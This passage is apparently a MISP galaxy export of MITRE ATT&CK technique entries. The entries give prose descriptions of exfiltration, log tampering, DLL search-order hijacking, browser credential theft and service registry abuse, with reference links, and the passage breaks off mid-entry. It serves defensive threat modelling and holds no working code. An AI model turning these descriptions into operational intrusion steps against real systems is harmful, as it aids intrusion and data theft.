https://attack.mitre.org/techniques/T1228

Receive operator KITs/KIQs tasking - T1235

Analysts may receive intelligence requirements from leadership and begin research process to satisfy a requirement. Part of this process may include delineating between needs and wants and thinking through all the possible aspects associating with satisfying a requirement. (Citation: FBIIntelligencePrimer)

The tag is: misp-galaxy:mitre-attack-pattern="Receive operator KITs/KIQs tasking - T1235"

Table 3243. Table References
Links
https://attack.mitre.org/techniques/T1235

Data Transfer Size Limits - T1030

An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.

The tag is: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030"

Table 3244. Table References
Links
https://attack.mitre.org/techniques/T1030
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Data from Local System - T1005

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"

Table 3245. Table References
Links
https://attack.mitre.org/techniques/T1005

Indicator Removal on Host - T1070

Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*.

These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.

The tag is: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070"

Table 3246. Table References
Links
https://attack.mitre.org/techniques/T1070
https://capec.mitre.org/data/definitions/93.html

Exfiltration Over C2 Channel - T1041

Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041"

Table 3247. Table References
Links
https://attack.mitre.org/techniques/T1041
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Exploitation of Remote Services - T1210

Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.

An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.

There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)

Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210"

Table 3248. Table References
Links
https://attack.mitre.org/techniques/T1210
https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/
https://nvd.nist.gov/vuln/detail/CVE-2017-0176
https://nvd.nist.gov/vuln/detail/CVE-2016-6662
https://nvd.nist.gov/vuln/detail/CVE-2014-7169

System Network Configuration Discovery - T1016

Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](ifconfig(https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).

Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.

The tag is: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016"

Table 3249. Table References
Links
https://attack.mitre.org/techniques/T1016
https://capec.mitre.org/data/definitions/309.html

Replication Through Removable Media - T1091

Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media’s firmware itself.

The tag is: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091"

Table 3250. Table References
Links
https://attack.mitre.org/techniques/T1091

Exploitation for Client Execution - T1203

Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.

Several types exist:

Browser-based Exploitation

Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.

Office Applications

Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.

Common Third-party Applications

Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203"

Table 3251. Table References
Links
https://attack.mitre.org/techniques/T1203

Change Default File Association - T1042

When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

The tag is: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1042"

View relationships graph

Change Default File Association - T1042 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1546.001" with estimative-language:likelihood-probability="almost-certain"

Table 3252. Table References
Links
https://attack.mitre.org/techniques/T1042
https://capec.mitre.org/data/definitions/556.html
https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
http://msdn.microsoft.com/en-us/library/bb166549.aspx
https://docs.microsoft.com/windows-server/administration/windows-commands/assoc
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd

File and Directory Discovery - T1420

On Android, command line tools or the Java file APIs can be used to enumerate file system contents. However, Linux file permissions and SELinux policies generally strongly restrict what can be accessed by apps (without taking advantage of a privilege escalation exploit). The contents of the external storage directory are generally visible, which could present concern if sensitive data is inappropriately stored there.

iOS’s security architecture generally restricts the ability to perform file and directory discovery without use of escalated privileges.

The tag is: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420"

Table 3253. Table References
Links
https://attack.mitre.org/techniques/T1420

Data from Removable Media - T1025

Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.

Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025"

Table 3254. Table References
Links
https://attack.mitre.org/techniques/T1025

Exfiltration Over Physical Medium - T1052

Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Physical Medium - T1052"

Table 3255. Table References
Links
https://attack.mitre.org/techniques/T1052

Data from Configuration Repository - T1602

Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.

Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Data from Configuration Repository - T1602"

Table 3256. Table References
Links
https://attack.mitre.org/techniques/T1602
https://www.us-cert.gov/ncas/alerts/TA18-106A
https://us-cert.cisa.gov/ncas/alerts/TA17-156A
https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3

Obfuscated Files or Information - T1027

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user’s action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as JavaScript.

Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)

Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"

Table 3257. Table References
Links
https://attack.mitre.org/techniques/T1027
https://capec.mitre.org/data/definitions/267.html
https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/
https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/
https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/
https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html
https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf
https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/
https://github.com/danielbohannon/Revoke-Obfuscation
https://github.com/itsreallynick/office-crackros

Communication Through Removable Media - T1092

Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.

The tag is: misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092"

Table 3258. Table References
Links
https://attack.mitre.org/techniques/T1092

Modify Cached Executable Code - T1403

ART (the Android Runtime) compiles optimized code on the device itself to improve performance. An adversary may be able to use escalated privileges to modify the cached code in order to hide malicious behavior. Since the code is compiled on the device, it may not receive the same level of integrity checks that are provided to code running in the system partition.(Citation: Sabanal-ART)

The tag is: misp-galaxy:mitre-attack-pattern="Modify Cached Executable Code - T1403"

Table 3259. Table References
Links
https://attack.mitre.org/techniques/T1403
https://www.blackhat.com/docs/asia-15/materials/asia-15-Sabanal-Hiding-Behind-ART-wp.pdf

Credentials from Web Browsers - T1503

Adversaries may acquire credentials from web browsers by reading files specific to the target browser. (Citation: Talos Olympic Destroyer 2018)

Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.

Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1503"

View relationships graph

Credentials from Web Browsers - T1503 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 3260. Table References
Links
https://attack.mitre.org/techniques/T1503
https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
https://github.com/putterpanda/mimikittenz

File and Directory Discovery - T1083

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).

The tag is: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"

Table 3261. Table References
Links
https://attack.mitre.org/techniques/T1083
https://capec.mitre.org/data/definitions/127.html
https://capec.mitre.org/data/definitions/497.html
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

DLL Search Order Hijacking - T1038

Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence.

Adversaries may perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL.

Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant Search Order)

Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.

The tag is: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1038"

View relationships graph

DLL Search Order Hijacking - T1038 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

Table 3262. Table References
Links
https://attack.mitre.org/techniques/T1038
https://capec.mitre.org/data/definitions/471.html
http://msdn.microsoft.com/en-US/library/ms682586
https://www.owasp.org/index.php/Binary_planting
https://msrc-blog.microsoft.com/2010/08/21/microsoft-security-advisory-2269637-released/
http://msdn.microsoft.com/en-US/library/ms682600
https://msdn.microsoft.com/en-US/library/aa375365
https://www.mandiant.com/blog/dll-search-order-hijacking-revisited/

Deploy exploit using advertising - T1380

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Exploits spread through advertising (malvertising) involve injecting malicious or malware-laden advertisements into legitimate online advertising networks and webpages. (Citation: TPMalvertising)

The tag is: misp-galaxy:mitre-attack-pattern="Deploy exploit using advertising - T1380"

Table 3263. Table References
Links
https://attack.mitre.org/techniques/T1380

Detect App Analysis Environment - T1440

An adversary could evade app vetting techniques by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis.

Discussion of general Android anti-analysis techniques can be found in (Citation: Petsas). Discussion of Google Play Store-specific anti-analysis techniques can be found in (Citation: Oberheide-Bouncer), (Citation: Percoco-Bouncer).

(Citation: Wang) presents a discussion of iOS anti-analysis techniques.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Detect App Analysis Environment - T1440"

View relationships graph

Detect App Analysis Environment - T1440 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

Table 3264. Table References
Links
https://attack.mitre.org/techniques/T1440

File System Permissions Weakness - T1044

Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Services

Manipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable.

Executable Installers

Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the <code>%TEMP%</code> directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)

The tag is: misp-galaxy:mitre-attack-pattern="File System Permissions Weakness - T1044"

View relationships graph

File System Permissions Weakness - T1044 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Services File Permissions Weakness - T1574.010" with estimative-language:likelihood-probability="almost-certain"

Table 3265. Table References
Links
https://attack.mitre.org/techniques/T1044
https://capec.mitre.org/data/definitions/17.html
https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/
http://seclists.org/fulldisclosure/2015/Dec/34

Obfuscated Files or Information - T1406

An app could contain malicious code in obfuscated or encrypted form, then deobfuscate or decrypt the code at runtime to evade many app vetting techniques.(Citation: Rastogi) (Citation: Zhou) (Citation: TrendMicro-Obad) (Citation: Xiao-iOS)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406"

Table 3266. Table References
Links
https://attack.mitre.org/techniques/T1406
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html
http://pages.cs.wisc.edu/_{vrastogi/static/papers/rcj13b.pdf[http://pages.cs.wisc.edu/}vrastogi/static/papers/rcj13b.pdf]
http://ieeexplore.ieee.org/document/6234407
http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/
http://www.slideshare.net/Shakacon/fruit-vs-zombies-defeat-nonjailbroken-ios-malware-by-claud-xiao

Obtain Device Cloud Backups - T1470

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud backup services (e.g. Google’s Android backup service or Apple’s iCloud) could use that access to obtain sensitive data stored in device backups. For example, the Elcomsoft Phone Breaker product advertises the ability to retrieve iOS backup data from Apple’s iCloud (Citation: Elcomsoft-EPPB). Elcomsoft also describes (Citation: Elcomsoft-WhatsApp) obtaining WhatsApp communication histories from backups stored in iCloud.

The tag is: misp-galaxy:mitre-attack-pattern="Obtain Device Cloud Backups - T1470"

Table 3267. Table References
Links
https://attack.mitre.org/techniques/T1470
https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-0.html
https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-1.html
https://www.elcomsoft.com/eppb.html
https://blog.elcomsoft.com/2017/07/extract-and-decrypt-whatsapp-backups-from-icloud/

Exfiltration Over Alternative Protocol - T1048

Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels.

[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux <code>curl</code> may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048"

Table 3268. Table References
Links
https://attack.mitre.org/techniques/T1048
http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/
https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Access Stored Application Data - T1409

Adversaries may access and collect application data resident on the device. Adversaries often target popular applications such as Facebook, WeChat, and Gmail.(Citation: SWB Exodus March 2019)

This technique requires either escalated privileges or for the targeted app to have stored the data in an insecure manner (e.g., with insecure file permissions or in an insecure location such as an external storage directory).

The tag is: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409"

Table 3269. Table References
Links
https://attack.mitre.org/techniques/T1409
https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-0.html
https://securitywithoutborders.org/blog/2019/03/29/exodus.html

System Network Connections Discovery - T1049

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary’s goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview)

Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session".

The tag is: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049"

Table 3270. Table References
Links
https://attack.mitre.org/techniques/T1049
https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html
https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview
https://cloud.google.com/vpc/docs/vpc

Use Alternate Authentication Material - T1550

Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.

Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)

Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.

The tag is: misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550"

Table 3271. Table References
Links
https://attack.mitre.org/techniques/T1550
https://csrc.nist.gov/glossary/term/authentication
https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
https://technet.microsoft.com/en-us/library/dn487457.aspx

Service Registry Permissions Weakness - T1058

Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service’s Registry keys can be manipulated to modify a service’s execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1086), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: MSDN Registry Key Security)

If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).

Adversaries may also alter Registry keys associated with service failure parameters (such as <code>FailureCommand</code>) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: TrustedSignal Service Failure)(Citation: Twitter Service Recovery Nov 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Service Registry Permissions Weakness - T1058"

View relationships graph

Service Registry Permissions Weakness - T1058 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 3272. Table References
Links
https://attack.mitre.org/techniques/T1058
https://capec.mitre.org/data/definitions/478.html
https://msdn.microsoft.com/library/windows/desktop/ms724878.aspx
https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html
https://twitter.com/r0wdy_/status/936365549553991680
https://technet.microsoft.com/en-us/sysinternals/bb963902

Command and Scripting Interpreter - T1059

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).

There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).

Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)

The tag is: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059"

Table 3273. Table References
Links
https://attack.mitre.org/techniques/T1059
https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
https://tools.cisco.com/security/center/resources/integrity_assurance.html#23
https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python

Gather Victim Network Information - T1590

Adversaries may gather information about the victim’s networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Gather Victim Network Information - T1590"

Table 3274. Table References
Links
https://attack.mitre.org/techniques/T1590
https://www.whois.net/
https://dnsdumpster.com/
https://www.circl.lu/services/passive-dns/

Indicator Removal from Tools - T1066

If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target’s defensive systems or subsequent targets that may use similar systems.

